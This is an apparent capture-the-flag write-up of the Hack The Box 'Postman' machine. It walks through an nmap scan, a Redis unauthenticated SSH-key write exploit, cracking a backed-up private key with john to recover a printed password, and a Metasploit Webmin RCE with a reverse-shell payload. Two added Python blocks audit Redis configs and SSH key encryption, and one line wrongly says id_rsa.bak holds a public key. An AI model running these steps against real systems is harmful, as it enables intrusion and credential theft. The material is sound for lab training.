
HTB Postman - 10.10.10.160
Part 1 - Scanning
nmap -sV -sC -T5 -v -p- 10.10.10.160

PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: E234E3E8040EFB1ACD7028330A956EBF
| http-methods:
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp  open  redis    Redis key-value store 4.0.9
10000/tcp open  ssl/http MiniServ 1.910 (Webmin httpd)
|_http-favicon: Unknown favicon MD5: 91549383E709F4F1DD6C8DAB07890301
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-trane-info: Problem with XML parsing of /evox/about
| ssl-cert: Subject: commonName=*/organizationName=Webmin Webserver on Postman
| Issuer: commonName=*/organizationName=Webmin Webserver on Postman
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-08-25T16:26:22
| Not valid after:  2024-08-23T16:26:22
| MD5:   96f4 064c e63e 1277 4954 a4d9 a099 56ac
|_SHA-1: 4322 6ff3 ab7a 6ade 2887 9b89 6657 401c 3afd 5217
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Part 2 - Get User.txt

Port 6379 - Redis 4.0.9


The first thing we always do is check the service and its version in the vulnerability
registries: Exploit-DB, searchsploit (built into Kali), and so on.
There was an exploit on Exploit-DB and in searchsploit, but unfortunately it did not
work as intended.

So I continued searching, and after several attempts I found what actually
worked:

https://github.com/Avinash-acid/Redis-Server-Exploit

I had to slightly change the exploit code for our machine in this line (line 12):
From this:
script, ip_address, username = argv

To this:
ip_address = "10.10.10.160"
username = "redis"

Note:
The following package is needed:

redis-cli
https://codewithhugo.com/install-just-redis-cli-on-ubuntu-debian-jessie/

For the exploit to work properly, we need to query Redis with redis-cli until it
reports a working directory (dir) containing ".ssh":
redis-cli -h 10.10.10.160 config get dir
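As an added defensive check (not part of the original writeup or of the exploit repository), the Python below audits a redis.conf for the settings that make this foothold possible: no requirepass, a listener on every interface, protected-mode switched off, the CONFIG command left enabled, and dir/dbfilename already pointing at SSH material. It also parses the numbered reply that redis-cli prints for the config get dir query above. The two configuration texts and the CLI reply are constructed samples, not files taken from the box.

```python
"""Added example, not from the writeup: audit a redis.conf for the weaknesses the
Postman foothold depends on.  With no password, a listener on every interface and
CONFIG still enabled, any client can change `dir`/`dbfilename` at runtime and make
Redis write its dump file wherever the redis user may write.  All sample data below
is constructed."""

WEAK_CONF = """\
# constructed sample: the kind of configuration the exploit needs
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis/.ssh
dbfilename authorized_keys
"""

HARDENED_CONF = """\
# constructed sample: loopback only, authenticated, CONFIG disabled
# (the requirepass value is a placeholder, not a real secret)
bind 127.0.0.1 ::1
protected-mode yes
port 6379
requirepass example-long-random-passphrase
rename-command CONFIG ""
rename-command DEBUG ""
dir /var/lib/redis
dbfilename dump.rdb
"""

# Constructed sample of what `redis-cli config get dir` prints.
CLI_REPLY = """\
1) "dir"
2) "/var/lib/redis/.ssh"
"""

ALL_INTERFACES = {"0.0.0.0", "*", "::"}


def parse_conf(text):
    """Map each directive to the list of its values (bind/rename-command may repeat)."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(maxsplit=1)
        value = parts[1] if len(parts) > 1 else ""
        conf.setdefault(parts[0].lower(), []).append(value)
    return conf


def parse_config_get(reply):
    """Turn redis-cli's numbered CONFIG GET reply into {name: value}."""
    values = []
    for line in reply.splitlines():
        line = line.strip()
        if line:
            values.append(line.partition(") ")[2].strip('"'))
    return dict(zip(values[::2], values[1::2]))


def dir_targets_ssh(directory, dbfilename="dump.rdb"):
    """True when the dump would land inside a .ssh directory or be named authorized_keys."""
    return ".ssh" in directory.split("/") or dbfilename == "authorized_keys"


def audit_redis_conf(text):
    """Return a list of findings; an empty list means none of the weak settings is present."""
    conf = parse_conf(text)
    findings = []
    if not conf.get("requirepass"):
        findings.append("no requirepass: every TCP client is a full administrator")
    # Without a bind directive Redis listens on all interfaces.
    bind_tokens = set(" ".join(conf.get("bind", ["0.0.0.0"])).split())
    if bind_tokens & ALL_INTERFACES:
        findings.append(f"bind {' '.join(sorted(bind_tokens))}: reachable from other hosts")
    if conf.get("protected-mode", ["yes"])[-1].lower() == "no":
        findings.append("protected-mode no: the guard against remote unauthenticated clients is off")
    renamed = {v.split()[0].upper() for v in conf.get("rename-command", []) if v}
    if "CONFIG" not in renamed:
        findings.append("CONFIG not renamed: dir and dbfilename can be changed at runtime")
    directory = conf.get("dir", ["./"])[-1]
    dbfilename = conf.get("dbfilename", ["dump.rdb"])[-1]
    if dir_targets_ssh(directory, dbfilename):
        findings.append(f"dump path points at SSH material: {directory}/{dbfilename}")
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_redis_conf(conf) or ["no findings"])
    print(parse_config_get(CLI_REPLY))
```

Run against a real redis.conf, the weak sample yields five findings and the hardened one none; the same dir_targets_ssh check can be applied to the live value returned by config get dir to spot an instance whose working directory has already been moved into a user's .ssh folder.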

Redis – Operation

After running the exploit from GitHub, we get SSH access as the low-privileged user redis.
(You do not need to enter any password when it starts ... just press ENTER until you
win.)
Then we go to the /tmp directory and run the well-known LinEnum:

https://github.com/rebootuser/LinEnum

Later, looking closely at the enumeration output, we notice that the /opt folder
contains id_rsa.bak, which usually stores the public key for SSH.

We open the key with cat and copy everything from there.

To turn id_rsa into a crackable hash and then recover the passphrase of the privileged
user, we need ssh2john and john respectively.

So we convert id_rsa into a hash:


ssh2john.py id_rsa.bak > redis_rsa

We get something like this (an MD5-based hash):


id_rsa.bak:$sshng$0$8$73E9CEFBCCF5287C$119$25e840e75235eebb0238e56ac96c7e0bcdfadc8381617435d43770fe9af72f6036343b41eedb5f9f9b9bf9d9bf9d9bf9d9bf9a9aaaaaaaaa..

Use john to crack it:


john --format=SSH --wordlist=/usr/share/wordlists/rockyou.txt redis_rsa
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008 (id_rsa.bak)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:06 DONE (2019-12-23 22:12) 0.1503g/s 2156Kp/s 2156Kc/s 2156KC/s a6_123..*7¡Vamos!

We found the user's password!
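The john output above reports the key's KDF/cipher as MD5/3DES, i.e. a legacy PEM key whose encryption key is derived with a single MD5 pass, which is why a wordlist cracks it in seconds. As an added defensive example (not part of the writeup), the Python below classifies how a private key is protected at rest, so that such keys can be found and re-encrypted with ssh-keygen -p -o -a <rounds> into the bcrypt-protected OpenSSH format. The legacy sample reuses only the PEM header layout and the salt visible in the hash above; the OpenSSH sample is a constructed header-only blob built by build_openssh_header (a hypothetical helper), not a real key.

```python
"""Added example, not from the writeup: classify how an SSH private key is encrypted
at rest.  Legacy PEM keys (Proc-Type/DEK-Info headers) derive the cipher key with a
single MD5 pass and no work factor, which is what makes them cheap to crack offline;
the openssh-key-v1 format stores a KDF name and, for bcrypt, a round count.  The
sample keys are constructed and contain no real key material."""
import base64
import re
import struct

# Constructed legacy PEM header; the salt is the one visible in the writeup's hash.
LEGACY_KEY = """\
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C

(body omitted in this constructed sample)
-----END RSA PRIVATE KEY-----
"""


def _pstr(data):
    """Encode an SSH 'string': 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


def _read_string(blob, offset):
    (length,) = struct.unpack(">I", blob[offset:offset + 4])
    start = offset + 4
    return blob[start:start + length], start + length


def build_openssh_header(cipher=b"aes256-ctr", kdf=b"bcrypt", rounds=16):
    """Constructed: only the leading fields of an openssh-key-v1 blob (magic, cipher,
    kdf, kdf options, key count).  A real key continues with the public and the
    encrypted private sections, which the classifier never needs to read."""
    opts = (_pstr(b"\x00" * 16) + struct.pack(">I", rounds)) if kdf == b"bcrypt" else b""
    blob = b"openssh-key-v1\x00" + _pstr(cipher) + _pstr(kdf) + _pstr(opts) + struct.pack(">I", 1)
    b64 = base64.b64encode(blob).decode()
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{b64}\n-----END OPENSSH PRIVATE KEY-----\n"


def classify_ssh_private_key(text):
    """Return {'format', 'cipher', 'kdf', 'rounds'} describing the key's protection."""
    if "BEGIN OPENSSH PRIVATE KEY" in text:
        body = "".join(line for line in text.splitlines() if not line.startswith("-----"))
        blob = base64.b64decode(body)
        magic = b"openssh-key-v1\x00"
        if not blob.startswith(magic):
            raise ValueError("not an openssh-key-v1 blob")
        cipher, off = _read_string(blob, len(magic))
        kdf, off = _read_string(blob, off)
        kdfopts, _ = _read_string(blob, off)
        rounds = None
        if kdf == b"bcrypt":
            # kdf options = string salt || uint32 rounds
            _salt, o = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
        return {"format": "openssh-v1", "cipher": cipher.decode(), "kdf": kdf.decode(), "rounds": rounds}
    dek = re.search(r"^DEK-Info:\s*([A-Z0-9-]+),", text, re.M)
    if "Proc-Type: 4,ENCRYPTED" in text and dek:
        # EVP_BytesToKey with MD5: effectively one hash iteration, no tunable cost.
        return {"format": "legacy-pem", "cipher": dek.group(1), "kdf": "md5", "rounds": None}
    if "PRIVATE KEY" in text:
        return {"format": "legacy-pem", "cipher": "none", "kdf": "none", "rounds": None}
    raise ValueError("not a recognised private key")


def is_weakly_protected(info, min_rounds=16):
    """Anything but bcrypt with a sensible round count is cheap to attack offline."""
    return info["kdf"] != "bcrypt" or info["rounds"] < min_rounds


if __name__ == "__main__":
    for label, key in (("legacy", LEGACY_KEY), ("openssh", build_openssh_header())):
        info = classify_ssh_private_key(key)
        print(label, info, "WEAK" if is_weakly_protected(info) else "ok")
```

Pointed at a directory of backed-up keys, classify_ssh_private_key flags every Proc-Type/DEK-Info key and every openssh-key-v1 key with kdf "none" or a low round count; those are the ones an attacker who finds a stray id_rsa.bak can crack the way the writeup shows.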

At this point, we need to find the username in the /home directory.


ls -la /home
total 12
drwxr-xr-x 3 root root 4096 Sep 11 11:27 .
drwxr-xr-x 22 root root 4096 Aug 25 15:03 ..
drwxr-xr-x 6 Matt Matt 4096 Sep 11 11:28 Matt
Now sudo from the user “redis” to the user “Matt” with this password, and we can read
the user.txt file.

Part 3 - Port 10000 - Webmin | root.txt


It’s time to get root.txt.

Since there is a Webmin service running on port 10000, let's check whether we can log in
with Matt's credentials.

It works!

Run Metasploit to see whether there is any known exploit for Webmin 1.910:
- Go to msfconsole
- Search for an exploit: search webmin
- There we select literally the very first exploit, namely the RCE Package Updater module:

Payload options (cmd/unix/reverse):


Run the exploit and we get root, hurray!
